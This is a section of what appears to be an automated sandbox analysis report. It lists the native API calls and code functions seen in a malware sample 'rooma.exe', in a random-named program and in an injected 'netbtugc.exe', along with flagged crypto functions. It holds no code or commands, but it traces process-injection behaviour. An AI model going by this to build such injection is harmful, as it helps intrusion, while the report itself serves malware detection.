Source: C:\Users\user\AppData\Roaming\rooma.exe Code function: 7_2_015D3D70 NtOpenThread, 7_2_015D3D70
Source: C:\Users\user\AppData\Roaming\rooma.exe Code function: 7_2_015D2D10 NtMapViewOfSection, 7_2_015D2D10
Source: C:\Users\user\AppData\Roaming\rooma.exe Code function: 7_2_015D3D10 NtOpenProcessToken, 7_2_015D3D10
Source: C:\Users\user\AppData\Roaming\rooma.exe Code function: 7_2_015D2D00 NtSetInformationFile, 7_2_015D2D00
Source: C:\Users\user\AppData\Roaming\rooma.exe Code function: 7_2_015D2D30 NtUnmapViewOfSection, 7_2_015D2D30
Source: C:\Users\user\AppData\Roaming\rooma.exe Code function: 7_2_015D2DD0 NtDelayExecution, 7_2_015D2DD0
Source: C:\Users\user\AppData\Roaming\rooma.exe Code function: 7_2_015D2DB0 NtEnumerateKey, 7_2_015D2DB0
Source: C:\Users\user\AppData\Roaming\rooma.exe Code function: 7_2_015D2C60 NtCreateKey, 7_2_015D2C60
Source: C:\Users\user\AppData\Roaming\rooma.exe Code function: 7_2_015D2C00 NtQueryInformationProcess, 7_2_015D2C00
Source: C:\Users\user\AppData\Roaming\rooma.exe Code function: 7_2_015D2CC0 NtQueryVirtualMemory, 7_2_015D2CC0
Source: C:\Users\user\AppData\Roaming\rooma.exe Code function: 7_2_015D2CF0 NtOpenProcess, 7_2_015D2CF0
Source: C:\Users\user\AppData\Roaming\rooma.exe Code function: 7_2_015D2CA0 NtQueryInformationToken, 7_2_015D2CA0
Source: C:\Users\user\AppData\Roaming\rooma.exe Code function: 7_2_015D2F60 NtCreateProcessEx, 7_2_015D2F60
Source: C:\Users\user\AppData\Roaming\rooma.exe Code function: 7_2_015D2F30 NtCreateSection, 7_2_015D2F30
Source: C:\Users\user\AppData\Roaming\rooma.exe Code function: 7_2_015D2FE0 NtCreateFile, 7_2_015D2FE0
Source: C:\Users\user\AppData\Roaming\rooma.exe Code function: 7_2_015D2F90 NtProtectVirtualMemory, 7_2_015D2F90
Source: C:\Users\user\AppData\Roaming\rooma.exe Code function: 7_2_015D2FB0 NtResumeThread, 7_2_015D2FB0
Source: C:\Users\user\AppData\Roaming\rooma.exe Code function: 7_2_015D2FA0 NtQuerySection, 7_2_015D2FA0
Source: C:\Users\user\AppData\Roaming\rooma.exe Code function: 7_2_015D2E30 NtWriteVirtualMemory, 7_2_015D2E30
Source: C:\Users\user\AppData\Roaming\rooma.exe Code function: 7_2_015D2EE0 NtQueueApcThread, 7_2_015D2EE0
Source: C:\Users\user\AppData\Roaming\rooma.exe Code function: 7_2_015D2E80 NtReadVirtualMemory, 7_2_015D2E80
Source: C:\Users\user\AppData\Roaming\rooma.exe Code function: 7_2_015D2EA0 NtAdjustPrivilegesToken, 7_2_015D2EA0
Source: C:\Windows\SysWOW64\netbtugc.exe Code function: 10_2_02F24340 NtSetContextThread,LdrInitializeThunk, 10_2_02F24340
Source: C:\Windows\SysWOW64\netbtugc.exe Code function: 10_2_02F24650 NtSuspendThread,LdrInitializeThunk, 10_2_02F24650
Source: C:\Windows\SysWOW64\netbtugc.exe Code function: 10_2_02F235C0 NtCreateMutant,LdrInitializeThunk, 10_2_02F235C0
Source: C:\Windows\SysWOW64\netbtugc.exe Code function: 10_2_02F22AF0 NtWriteFile,LdrInitializeThunk, 10_2_02F22AF0
Source: C:\Windows\SysWOW64\netbtugc.exe Code function: 10_2_02F22AD0 NtReadFile,LdrInitializeThunk, 10_2_02F22AD0
Source: C:\Windows\SysWOW64\netbtugc.exe Code function: 10_2_02F22BF0 NtAllocateVirtualMemory,LdrInitializeThunk, 10_2_02F22BF0
Source: C:\Windows\SysWOW64\netbtugc.exe Code function: 10_2_02F22BE0 NtQueryValueKey,LdrInitializeThunk, 10_2_02F22BE0
Source: C:\Windows\SysWOW64\netbtugc.exe Code function: 10_2_02F22BA0 NtEnumerateValueKey,LdrInitializeThunk, 10_2_02F22BA0
Source: C:\Windows\SysWOW64\netbtugc.exe Code function: 10_2_02F22B60 NtClose,LdrInitializeThunk, 10_2_02F22B60
Source: C:\Windows\SysWOW64\netbtugc.exe Code function: 10_2_02F239B0 NtGetContextThread,LdrInitializeThunk, 10_2_02F239B0
Source: C:\Windows\SysWOW64\netbtugc.exe Code function: 10_2_02F22EE0 NtQueueApcThread,LdrInitializeThunk, 10_2_02F22EE0
Source: C:\Windows\SysWOW64\netbtugc.exe Code function: 10_2_02F22E80 NtReadVirtualMemory,LdrInitializeThunk, 10_2_02F22E80
Source: C:\Windows\SysWOW64\netbtugc.exe Code function: 10_2_02F22FE0 NtCreateFile,LdrInitializeThunk, 10_2_02F22FE0
Source: C:\Windows\SysWOW64\netbtugc.exe Code function: 10_2_02F22FB0 NtResumeThread,LdrInitializeThunk, 10_2_02F22FB0
Source: C:\Windows\SysWOW64\netbtugc.exe Code function: 10_2_02F22F30 NtCreateSection,LdrInitializeThunk, 10_2_02F22F30
Source: C:\Windows\SysWOW64\netbtugc.exe Code function: 10_2_02F22CA0 NtQueryInformationToken,LdrInitializeThunk, 10_2_02F22CA0
Source: C:\Windows\SysWOW64\netbtugc.exe Code function: 10_2_02F22C70 NtFreeVirtualMemory,LdrInitializeThunk, 10_2_02F22C70
Source: C:\Windows\SysWOW64\netbtugc.exe Code function: 10_2_02F22C60 NtCreateKey,LdrInitializeThunk, 10_2_02F22C60
Source: C:\Windows\SysWOW64\netbtugc.exe Code function: 10_2_02F22DF0 NtQuerySystemInformation,LdrInitializeThunk, 10_2_02F22DF0
Source: C:\Windows\SysWOW64\netbtugc.exe Code function: 10_2_02F22DD0 NtDelayExecution,LdrInitializeThunk, 10_2_02F22DD0
Source: C:\Windows\SysWOW64\netbtugc.exe Code function: 10_2_02F22D30 NtUnmapViewOfSection,LdrInitializeThunk, 10_2_02F22D30
Source: C:\Windows\SysWOW64\netbtugc.exe Code function: 10_2_02F22D10 NtMapViewOfSection,LdrInitializeThunk, 10_2_02F22D10
Source: C:\Windows\SysWOW64\netbtugc.exe Code function: 10_2_02F23090 NtSetValueKey, 10_2_02F23090
Source: C:\Windows\SysWOW64\netbtugc.exe Code function: 10_2_02F23010 NtOpenDirectoryObject, 10_2_02F23010
Source: C:\Windows\SysWOW64\netbtugc.exe Code function: 10_2_02F22AB0 NtWaitForSingleObject, 10_2_02F22AB0
Source: C:\Windows\SysWOW64\netbtugc.exe Code function: 10_2_02F22B80 NtQueryInformationFile, 10_2_02F22B80
Source: C:\Windows\SysWOW64\netbtugc.exe Code function: 10_2_02F22EA0 NtAdjustPrivilegesToken, 10_2_02F22EA0
Source: C:\Windows\SysWOW64\netbtugc.exe Code function: 10_2_02F22E30 NtWriteVirtualMemory, 10_2_02F22E30
Source: C:\Windows\SysWOW64\netbtugc.exe Code function: 10_2_02F22FA0 NtQuerySection, 10_2_02F22FA0
Source: C:\Windows\SysWOW64\netbtugc.exe Code function: 10_2_02F22F90 NtProtectVirtualMemory, 10_2_02F22F90
Source: C:\Windows\SysWOW64\netbtugc.exe Code function: 10_2_02F22F60 NtCreateProcessEx, 10_2_02F22F60
Source: C:\Windows\SysWOW64\netbtugc.exe Code function: 10_2_02F22CF0 NtOpenProcess, 10_2_02F22CF0
Source: C:\Windows\SysWOW64\netbtugc.exe Code function: 10_2_02F22CC0 NtQueryVirtualMemory, 10_2_02F22CC0
Source: C:\Windows\SysWOW64\netbtugc.exe Code function: 10_2_02F22C00 NtQueryInformationProcess, 10_2_02F22C00
Source: C:\Windows\SysWOW64\netbtugc.exe Code function: 10_2_02F22DB0 NtEnumerateKey, 10_2_02F22DB0
Source: C:\Windows\SysWOW64\netbtugc.exe Code function: 10_2_02F23D70 NtOpenThread, 10_2_02F23D70
Source: C:\Windows\SysWOW64\netbtugc.exe Code function: 10_2_02F23D10 NtOpenProcessToken, 10_2_02F23D10
Source: C:\Windows\SysWOW64\netbtugc.exe Code function: 10_2_02F22D00 NtSetInformationFile, 10_2_02F22D00
Source: C:\Windows\SysWOW64\netbtugc.exe Code function: 10_2_02577A70 NtReadFile, 10_2_02577A70
Source: C:\Windows\SysWOW64\netbtugc.exe Code function: 10_2_02577B50 NtDeleteFile, 10_2_02577B50
Source: C:\Windows\SysWOW64\netbtugc.exe Code function: 10_2_02577BE0 NtClose, 10_2_02577BE0
Source: C:\Windows\SysWOW64\netbtugc.exe Code function: 10_2_02577920 NtCreateFile, 10_2_02577920
Source: C:\Windows\SysWOW64\netbtugc.exe Code function: 10_2_02577D30 NtAllocateVirtualMemory, 10_2_02577D30
Creates files inside the system directory
Source: C:\Windows\System32\svchost.exe File created: C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\Fonts\Download-1.tmp Jump to behavior
Detected potential crypto function
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 5_2_00007FFB4A34217E 5_2_00007FFB4A34217E
Source: C:\Users\user\AppData\Roaming\rooma.exe Code function: 7_2_009B28A0 7_2_009B28A0
Source: C:\Users\user\AppData\Roaming\rooma.exe Code function: 7_2_009C6871 7_2_009C6871
Source: C:\Users\user\AppData\Roaming\rooma.exe Code function: 7_2_009C6873 7_2_009C6873
Source: C:\Users\user\AppData\Roaming\rooma.exe Code function: 7_2_009BE1F3 7_2_009BE1F3
Source: C:\Users\user\AppData\Roaming\rooma.exe Code function: 7_2_009B1110 7_2_009B1110
Source: C:\Users\user\AppData\Roaming\rooma.exe Code function: 7_2_009C0173 7_2_009C0173
Source: C:\Users\user\AppData\Roaming\rooma.exe Code function: 7_2_009B1290 7_2_009B1290
Source: C:\Users\user\AppData\Roaming\rooma.exe Code function: 7_2_009B3500 7_2_009B3500
Source: C:\Users\user\AppData\Roaming\rooma.exe Code function: 7_2_009B2698 7_2_009B2698
Source: C:\Users\user\AppData\Roaming\rooma.exe Code function: 7_2_009B268A 7_2_009B268A
Source: C:\Users\user\AppData\Roaming\rooma.exe Code function: 7_2_009B26A0 7_2_009B26A0
Source: C:\Users\user\AppData\Roaming\rooma.exe Code function: 7_2_009BFF53 7_2_009BFF53
Source: C:\Users\user\AppData\Roaming\rooma.exe Code function: 7_2_009DD753 7_2_009DD753
Source: C:\Users\user\AppData\Roaming\rooma.exe Code function: 7_2_009BFF4A 7_2_009BFF4A
Source: C:\Users\user\AppData\Roaming\rooma.exe Code function: 7_2_0166B16B 7_2_0166B16B
Source: C:\Users\user\AppData\Roaming\rooma.exe Code function: 7_2_0158F172 7_2_0158F172
Source: C:\Users\user\AppData\Roaming\rooma.exe Code function: 7_2_015D516C 7_2_015D516C
Source: C:\Users\user\AppData\Roaming\rooma.exe Code function: 7_2_01590100 7_2_01590100
Source: C:\Users\user\AppData\Roaming\rooma.exe Code function: 7_2_0163A118 7_2_0163A118
Source: C:\Users\user\AppData\Roaming\rooma.exe Code function: 7_2_016581CC 7_2_016581CC
Source: C:\Users\user\AppData\Roaming\rooma.exe Code function: 7_2_016601AA 7_2_016601AA
Source: C:\Users\user\AppData\Roaming\rooma.exe Code function: 7_2_015AB1B0 7_2_015AB1B0
Source: C:\Users\user\AppData\Roaming\rooma.exe Code function: 7_2_0165F0E0 7_2_0165F0E0
Source: C:\Users\user\AppData\Roaming\rooma.exe Code function: 7_2_016570E9 7_2_016570E9
Source: C:\Users\user\AppData\Roaming\rooma.exe Code function: 7_2_015A70C0 7_2_015A70C0
Source: C:\Users\user\AppData\Roaming\rooma.exe Code function: 7_2_0164F0CC 7_2_0164F0CC
Source: C:\Users\user\AppData\Roaming\rooma.exe Code function: 7_2_0158D34C 7_2_0158D34C
Source: C:\Users\user\AppData\Roaming\rooma.exe Code function: 7_2_0165A352 7_2_0165A352
Source: C:\Users\user\AppData\Roaming\rooma.exe Code function: 7_2_0165132D 7_2_0165132D
Source: C:\Users\user\AppData\Roaming\rooma.exe Code function: 7_2_016603E6 7_2_016603E6
Source: C:\Users\user\AppData\Roaming\rooma.exe Code function: 7_2_015AE3F0 7_2_015AE3F0
Source: C:\Users\user\AppData\Roaming\rooma.exe Code function: 7_2_015E739A 7_2_015E739A
Source: C:\Users\user\AppData\Roaming\rooma.exe Code function: 7_2_01640274 7_2_01640274
Source: C:\Users\user\AppData\Roaming\rooma.exe Code function: 7_2_016412ED 7_2_016412ED
Source: C:\Users\user\AppData\Roaming\rooma.exe Code function: 7_2_015BB2C0 7_2_015BB2C0
Source: C:\Users\user\AppData\Roaming\rooma.exe Code function: 7_2_015A52A0 7_2_015A52A0
Source: C:\Users\user\AppData\Roaming\rooma.exe Code function: 7_2_01657571 7_2_01657571
Source: C:\Users\user\AppData\Roaming\rooma.exe Code function: 7_2_015A0535 7_2_015A0535
Source: C:\Users\user\AppData\Roaming\rooma.exe Code function: 7_2_0163D5B0 7_2_0163D5B0
Source: C:\Users\user\AppData\Roaming\rooma.exe Code function: 7_2_01660591 7_2_01660591
Source: C:\Users\user\AppData\Roaming\rooma.exe Code function: 7_2_01652446 7_2_01652446
Source: C:\Users\user\AppData\Roaming\rooma.exe Code function: 7_2_01591460 7_2_01591460
Source: C:\Users\user\AppData\Roaming\rooma.exe Code function: 7_2_0165F43F 7_2_0165F43F
Source: C:\Users\user\AppData\Roaming\rooma.exe Code function: 7_2_0164E4F6 7_2_0164E4F6
Source: C:\Users\user\AppData\Roaming\rooma.exe Code function: 7_2_015C4750 7_2_015C4750
Source: C:\Users\user\AppData\Roaming\rooma.exe Code function: 7_2_015A0770 7_2_015A0770
Source: C:\Users\user\AppData\Roaming\rooma.exe Code function: 7_2_0159C7C0 7_2_0159C7C0
Source: C:\Users\user\AppData\Roaming\rooma.exe Code function: 7_2_0165F7B0 7_2_0165F7B0
Source: C:\Users\user\AppData\Roaming\rooma.exe Code function: 7_2_016516CC 7_2_016516CC
Source: C:\Users\user\AppData\Roaming\rooma.exe Code function: 7_2_015BC6E0 7_2_015BC6E0
Source: C:\Users\user\AppData\Roaming\rooma.exe Code function: 7_2_015A9950 7_2_015A9950
Source: C:\Users\user\AppData\Roaming\rooma.exe Code function: 7_2_015BB950 7_2_015BB950
Source: C:\Users\user\AppData\Roaming\rooma.exe Code function: 7_2_015B6962 7_2_015B6962
Source: C:\Users\user\AppData\Roaming\rooma.exe Code function: 7_2_0166A9A6 7_2_0166A9A6
Source: C:\Users\user\AppData\Roaming\rooma.exe Code function: 7_2_015A29A0 7_2_015A29A0
Source: C:\Users\user\AppData\Roaming\rooma.exe Code function: 7_2_015A2840 7_2_015A2840
Source: C:\Users\user\AppData\Roaming\rooma.exe Code function: 7_2_015AA840 7_2_015AA840
Source: C:\Users\user\AppData\Roaming\rooma.exe Code function: 7_2_0160D800 7_2_0160D800
Source: C:\Users\user\AppData\Roaming\rooma.exe Code function: 7_2_015CE8F0 7_2_015CE8F0
Source: C:\Users\user\AppData\Roaming\rooma.exe Code function: 7_2_015A38E0 7_2_015A38E0
Source: C:\Users\user\AppData\Roaming\rooma.exe Code function: 7_2_015868B8 7_2_015868B8
Source: C:\Users\user\AppData\Roaming\rooma.exe Code function: 7_2_0165FB76 7_2_0165FB76
Source: C:\Users\user\AppData\Roaming\rooma.exe Code function: 7_2_0165AB40 7_2_0165AB40
Source: C:\Users\user\AppData\Roaming\rooma.exe Code function: 7_2_015DDBF9 7_2_015DDBF9
Source: C:\Users\user\AppData\Roaming\rooma.exe Code function: 7_2_01656BD7 7_2_01656BD7
Source: C:\Users\user\AppData\Roaming\rooma.exe Code function: 7_2_015BFB80 7_2_015BFB80
Source: C:\Users\user\AppData\Roaming\rooma.exe Code function: 7_2_01613A6C 7_2_01613A6C
Source: C:\Users\user\AppData\Roaming\rooma.exe Code function: 7_2_01657A46 7_2_01657A46
Source: C:\Users\user\AppData\Roaming\rooma.exe Code function: 7_2_0165FA49 7_2_0165FA49
Source: C:\Users\user\AppData\Roaming\rooma.exe Code function: 7_2_0164DAC6 7_2_0164DAC6
Source: C:\Users\user\AppData\Roaming\rooma.exe Code function: 7_2_0163DAAC 7_2_0163DAAC
Source: C:\Users\user\AppData\Roaming\rooma.exe Code function: 7_2_0159EA80 7_2_0159EA80
Source: C:\Users\user\AppData\Roaming\rooma.exe Code function: 7_2_015E5AA0 7_2_015E5AA0
Source: C:\Users\user\AppData\Roaming\rooma.exe Code function: 7_2_01657D73 7_2_01657D73
Source: C:\Users\user\AppData\Roaming\rooma.exe Code function: 7_2_015A3D40 7_2_015A3D40
Source: C:\Users\user\AppData\Roaming\rooma.exe Code function: 7_2_01651D5A 7_2_01651D5A
Source: C:\Users\user\AppData\Roaming\rooma.exe Code function: 7_2_015AAD00 7_2_015AAD00
Source: C:\Users\user\AppData\Roaming\rooma.exe Code function: 7_2_015BFDC0 7_2_015BFDC0
Source: C:\Users\user\AppData\Roaming\rooma.exe Code function: 7_2_0159ADE0 7_2_0159ADE0
Source: C:\Users\user\AppData\Roaming\rooma.exe Code function: 7_2_015B8DBF 7_2_015B8DBF
Source: C:\Users\user\AppData\Roaming\rooma.exe Code function: 7_2_01619C32 7_2_01619C32
Source: C:\Users\user\AppData\Roaming\rooma.exe Code function: 7_2_015A0C00 7_2_015A0C00
Source: C:\Users\user\AppData\Roaming\rooma.exe Code function: 7_2_0165FCF2 7_2_0165FCF2
Source: C:\Users\user\AppData\Roaming\rooma.exe Code function: 7_2_01590CF2 7_2_01590CF2
Source: C:\Users\user\AppData\Roaming\rooma.exe Code function: 7_2_01640CB5 7_2_01640CB5
Source: C:\Users\user\AppData\Roaming\rooma.exe Code function: 7_2_01614F40 7_2_01614F40
Source: C:\Users\user\AppData\Roaming\rooma.exe Code function: 7_2_0165FF09 7_2_0165FF09
Source: C:\Users\user\AppData\Roaming\rooma.exe Code function: 7_2_015C0F30 7_2_015C0F30
Source: C:\Users\user\AppData\Roaming\rooma.exe Code function: 7_2_015E2F28 7_2_015E2F28
Source: C:\Users\user\AppData\Roaming\rooma.exe Code function: 7_2_01592FC8 7_2_01592FC8
Source: C:\Users\user\AppData\Roaming\rooma.exe Code function: 7_2_015ACFE0 7_2_015ACFE0
Source: C:\Users\user\AppData\Roaming\rooma.exe Code function: 7_2_015A1F92 7_2_015A1F92
Source: C:\Users\user\AppData\Roaming\rooma.exe Code function: 7_2_0165FFB1 7_2_0165FFB1
Source: C:\Users\user\AppData\Roaming\rooma.exe Code function: 7_2_015A0E59 7_2_015A0E59
Source: C:\Users\user\AppData\Roaming\rooma.exe Code function: 7_2_0165EE26 7_2_0165EE26
Source: C:\Users\user\AppData\Roaming\rooma.exe Code function: 7_2_0165EEDB 7_2_0165EEDB
Source: C:\Users\user\AppData\Roaming\rooma.exe Code function: 7_2_015B2E90 7_2_015B2E90
Source: C:\Users\user\AppData\Roaming\rooma.exe Code function: 7_2_015A9EB0 7_2_015A9EB0
Source: C:\Users\user\AppData\Roaming\rooma.exe Code function: 7_2_0165CE93 7_2_0165CE93
Source: C:\Program Files (x86)\QiaIEkSaKRjYgraAccrwCxYevAdoYwcGJiViCUCiHSVvXqyFaUAdZZI\TmjHHkXnMrncRmISMzN.exe Code function: 9_2_04AF2CAF 9_2_04AF2CAF
Source: C:\Program Files (x86)\QiaIEkSaKRjYgraAccrwCxYevAdoYwcGJiViCUCiHSVvXqyFaUAdZZI\TmjHHkXnMrncRmISMzN.exe Code function: 9_2_04AD54AF 9_2_04AD54AF
Source: C:\Program Files (x86)\QiaIEkSaKRjYgraAccrwCxYevAdoYwcGJiViCUCiHSVvXqyFaUAdZZI\TmjHHkXnMrncRmISMzN.exe Code function: 9_2_04AD54A6 9_2_04AD54A6
Source: C:\Program Files (x86)\QiaIEkSaKRjYgraAccrwCxYevAdoYwcGJiViCUCiHSVvXqyFaUAdZZI\TmjHHkXnMrncRmISMzN.exe Code function: 9_2_04ADBDCD 9_2_04ADBDCD
Source: C:\Program Files (x86)\QiaIEkSaKRjYgraAccrwCxYevAdoYwcGJiViCUCiHSVvXqyFaUAdZZI\TmjHHkXnMrncRmISMzN.exe Code function: 9_2_04ADBDCF 9_2_04ADBDCF
Source: C:\Program Files (x86)\QiaIEkSaKRjYgraAccrwCxYevAdoYwcGJiViCUCiHSVvXqyFaUAdZZI\TmjHHkXnMrncRmISMzN.exe Code function: 9_2_04AD56CF 9_2_04AD56CF
Source: C:\Windows\SysWOW64\netbtugc.exe Code function: 10_2_02F912ED 10_2_02F912ED
Source: C:\Windows\SysWOW64\netbtugc.exe Code function: 10_2_02F0B2C0 10_2_02F0B2C0
Source: C:\Windows\SysWOW64\netbtugc.exe Code function: 10_2_02EF52A0 10_2_02EF52A0
Source: C:\Windows\SysWOW64\netbtugc.exe Code function: 10_2_02F90274 10_2_02F90274
Source: C:\Windows\SysWOW64\netbtugc.exe Code function: 10_2_02FB03E6 10_2_02FB03E6
Source: C:\Windows\SysWOW64\netbtugc.exe Code function: 10_2_02EFE3F0 10_2_02EFE3F0
Source: C:\Windows\SysWOW64\netbtugc.exe Code function: 10_2_02F3739A 10_2_02F3739A
Source: C:\Windows\SysWOW64\netbtugc.exe Code function: 10_2_02EDD34C 10_2_02EDD34C
Source: C:\Windows\SysWOW64\netbtugc.exe Code function: 10_2_02FAA352 10_2_02FAA352
Source: C:\Windows\SysWOW64\netbtugc.exe Code function: 10_2_02FA132D 10_2_02FA132D
Source: C:\Windows\SysWOW64\netbtugc.exe Code function: 10_2_02FA70E9 10_2_02FA70E9
Source: C:\Windows\SysWOW64\netbtugc.exe Code function: 10_2_02FAF0E0 10_2_02FAF0E0
Source: C:\Windows\SysWOW64\netbtugc.exe Code function: 10_2_02EF70C0 10_2_02EF70C0
Source: C:\Windows\SysWOW64\netbtugc.exe Code function: 10_2_02F9F0CC 10_2_02F9F0CC
Source: C:\Windows\SysWOW64\netbtugc.exe Code function: 10_2_02FA81CC 10_2_02FA81CC
Source: C:\Windows\SysWOW64\netbtugc.exe Code function: 10_2_02FB01AA 10_2_02FB01AA
Source: C:\Windows\SysWOW64\netbtugc.exe Code function: 10_2_02EFB1B0 10_2_02EFB1B0
Source: C:\Windows\SysWOW64\netbtugc.exe Code function: 10_2_02FBB16B 10_2_02FBB16B
Source: C:\Windows\SysWOW64\netbtugc.exe Code function: 10_2_02F2516C 10_2_02F2516C
Source: C:\Windows\SysWOW64\netbtugc.exe Code function: 10_2_02EDF172 10_2_02EDF172
Source: C:\Windows\SysWOW64\netbtugc.exe Code function: 10_2_02F8A118 10_2_02F8A118
Source: C:\Windows\SysWOW64\netbtugc.exe Code function: 10_2_02EE0100 10_2_02EE0100
Source: C:\Windows\SysWOW64\netbtugc.exe Code function: 10_2_02F0C6E0 10_2_02F0C6E0
Source: C:\Windows\SysWOW64\netbtugc.exe Code function: 10_2_02FA16CC 10_2_02FA16CC
Source: C:\Windows\SysWOW64\netbtugc.exe Code function: 10_2_02EEC7C0 10_2_02EEC7C0
Source: C:\Windows\SysWOW64\netbtugc.exe Code function: 10_2_02FAF7B0 10_2_02FAF7B0
Source: C:\Windows\SysWOW64\netbtugc.exe Code function: 10_2_02EF0770 10_2_02EF0770
Source: C:\Windows\SysWOW64\netbtugc.exe Code function: 10_2_02F14750 10_2_02F14750
Source: C:\Windows\SysWOW64\netbtugc.exe Code function: 10_2_02F9E4F6 10_2_02F9E4F6
Source: C:\Windows\SysWOW64\netbtugc.exe Code function: 10_2_02EE1460 10_2_02EE1460
Source: C:\Windows\SysWOW64\netbtugc.exe Code function: 10_2_02FA2446 10_2_02FA2446
Source: C:\Windows\SysWOW64\netbtugc.exe Code function: 10_2_02FAF43F 10_2_02FAF43F
Source: C:\Windows\SysWOW64\netbtugc.exe Code function: 10_2_02F8D5B0 10_2_02F8D5B0
Source: C:\Windows\SysWOW64\netbtugc.exe Code function: 10_2_02FB0591 10_2_02FB0591
Source: C:\Windows\SysWOW64\netbtugc.exe Code function: 10_2_02FA7571 10_2_02FA7571
Source: C:\Windows\SysWOW64\netbtugc.exe Code function: 10_2_02EF0535 10_2_02EF0535
Source: C:\Windows\SysWOW64\netbtugc.exe Code function: 10_2_02F9DAC6 10_2_02F9DAC6
Source: C:\Windows\SysWOW64\netbtugc.exe Code function: 10_2_02F35AA0 10_2_02F35AA0
Source: C:\Windows\SysWOW64\netbtugc.exe Code function: 10_2_02F8DAAC 10_2_02F8DAAC
Source: C:\Windows\SysWOW64\netbtugc.exe Code function: 10_2_02EEEA80 10_2_02EEEA80
Source: C:\Windows\SysWOW64\netbtugc.exe Code function: 10_2_02F63A6C 10_2_02F63A6C
Source: C:\Windows\SysWOW64\netbtugc.exe Code function: 10_2_02FAFA49 10_2_02FAFA49
Source: C:\Windows\SysWOW64\netbtugc.exe Code function: 10_2_02FA7A46 10_2_02FA7A46
Source: C:\Windows\SysWOW64\netbtugc.exe Code function: 10_2_02F2DBF9 10_2_02F2DBF9
Source: C:\Windows\SysWOW64\netbtugc.exe Code function: 10_2_02FA6BD7 10_2_02FA6BD7
Source: C:\Windows\SysWOW64\netbtugc.exe Code function: 10_2_02F0FB80 10_2_02F0FB80
Source: C:\Windows\SysWOW64\netbtugc.exe Code function: 10_2_02FAFB76 10_2_02FAFB76
Source: C:\Windows\SysWOW64\netbtugc.exe Code function: 10_2_02FAAB40 10_2_02FAAB40
Source: C:\Windows\SysWOW64\netbtugc.exe Code function: 10_2_02F1E8F0 10_2_02F1E8F0
Source: C:\Windows\SysWOW64\netbtugc.exe Code function: 10_2_02EF38E0 10_2_02EF38E0
Source: C:\Windows\SysWOW64\netbtugc.exe Code function: 10_2_02ED68B8 10_2_02ED68B8
Source: C:\Windows\SysWOW64\netbtugc.exe Code function: 10_2_02EF2840 10_2_02EF2840
Source: C:\Windows\SysWOW64\netbtugc.exe Code function: 10_2_02EFA840 10_2_02EFA840
Source: C:\Windows\SysWOW64\netbtugc.exe Code function: 10_2_02EF29A0 10_2_02EF29A0
Source: C:\Windows\SysWOW64\netbtugc.exe Code function: 10_2_02FBA9A6 10_2_02FBA9A6
Source: C:\Windows\SysWOW64\netbtugc.exe Code function: 10_2_02F06962 10_2_02F06962
Source: C:\Windows\SysWOW64\netbtugc.exe Code function: 10_2_02F0B950 10_2_02F0B950
Source: C:\Windows\SysWOW64\netbtugc.exe Code function: 10_2_02EF9950 10_2_02EF9950
Source: C:\Windows\SysWOW64\netbtugc.exe Code function: 10_2_02FAEEDB 10_2_02FAEEDB
Source: C:\Windows\SysWOW64\netbtugc.exe Code function: 10_2_02EF9EB0 10_2_02EF9EB0
Source: C:\Windows\SysWOW64\netbtugc.exe Code function: 10_2_02F02E90 10_2_02F02E90
Source: C:\Windows\SysWOW64\netbtugc.exe Code function: 10_2_02FACE93 10_2_02FACE93
Source: C:\Windows\SysWOW64\netbtugc.exe Code function: 10_2_02EF0E59 10_2_02EF0E59
Source: C:\Windows\SysWOW64\netbtugc.exe Code function: 10_2_02FAEE26 10_2_02FAEE26
Source: C:\Windows\SysWOW64\netbtugc.exe Code function: 10_2_02EFCFE0 10_2_02EFCFE0
Source: C:\Windows\SysWOW64\netbtugc.exe Code function: 10_2_02EE2FC8 10_2_02EE2FC8
Source: C:\Windows\SysWOW64\netbtugc.exe Code function: 10_2_02FAFFB1 10_2_02FAFFB1
Source: C:\Windows\SysWOW64\netbtugc.exe Code function: 10_2_02EF1F92 10_2_02EF1F92
Source: C:\Windows\SysWOW64\netbtugc.exe Code function: 10_2_02F64F40 10_2_02F64F40
Source: C:\Windows\SysWOW64\netbtugc.exe Code function: 10_2_02F10F30 10_2_02F10F30
Source: C:\Windows\SysWOW64\netbtugc.exe Code function: 10_2_02F32F28 10_2_02F32F28
Source: C:\Windows\SysWOW64\netbtugc.exe Code function: 10_2_02FAFF09 10_2_02FAFF09
Source: C:\Windows\SysWOW64\netbtugc.exe Code function: 10_2_02FAFCF2 10_2_02FAFCF2
Source: C:\Windows\SysWOW64\netbtugc.exe Code function: 10_2_02EE0CF2 10_2_02EE0CF2
Source: C:\Windows\SysWOW64\netbtugc.exe Code function: 10_2_02F90CB5 10_2_02F90CB5
Source: C:\Windows\SysWOW64\netbtugc.exe Code function: 10_2_02F69C32 10_2_02F69C32
Source: C:\Windows\SysWOW64\netbtugc.exe Code function: 10_2_02EF0C00 10_2_02EF0C00
Source: C:\Windows\SysWOW64\netbtugc.exe Code function: 10_2_02EEADE0 10_2_02EEADE0
Source: C:\Windows\SysWOW64\netbtugc.exe Code function: 10_2_02F0FDC0 10_2_02F0FDC0
Source: C:\Windows\SysWOW64\netbtugc.exe Code function: 10_2_02F08DBF 10_2_02F08DBF
Source: C:\Windows\SysWOW64\netbtugc.exe Code function: 10_2_02FA7D73 10_2_02FA7D73
Source: C:\Windows\SysWOW64\netbtugc.exe Code function: 10_2_02FA1D5A 10_2_02FA1D5A
Source: C:\Windows\SysWOW64\netbtugc.exe Code function: 10_2_02EF3D40 10_2_02EF3D40
Source: C:\Windows\SysWOW64\netbtugc.exe Code function: 10_2_02EFAD00 10_2_02EFAD00
Source: C:\Windows\SysWOW64\netbtugc.exe Code function: 10_2_025615E0 10_2_025615E0
Source: C:\Windows\SysWOW64\netbtugc.exe Code function: 10_2_025630F0 10_2_025630F0
Source: C:\Windows\SysWOW64\netbtugc.exe Code function: 10_2_025630EE 10_2_025630EE
Source: C:\Windows\SysWOW64\netbtugc.exe Code function: 10_2_0255C7D0 10_2_0255C7D0
Source: C:\Windows\SysWOW64\netbtugc.exe Code function: 10_2_0255C7C7 10_2_0255C7C7
Source: C:\Windows\SysWOW64\netbtugc.exe Code function: 10_2_0255AA70 10_2_0255AA70
Source: C:\Windows\SysWOW64\netbtugc.exe Code function: 10_2_0255C9F0 10_2_0255C9F0
Source: C:\Windows\SysWOW64\netbtugc.exe Code function: 10_2_02579FD0 10_2_02579FD0
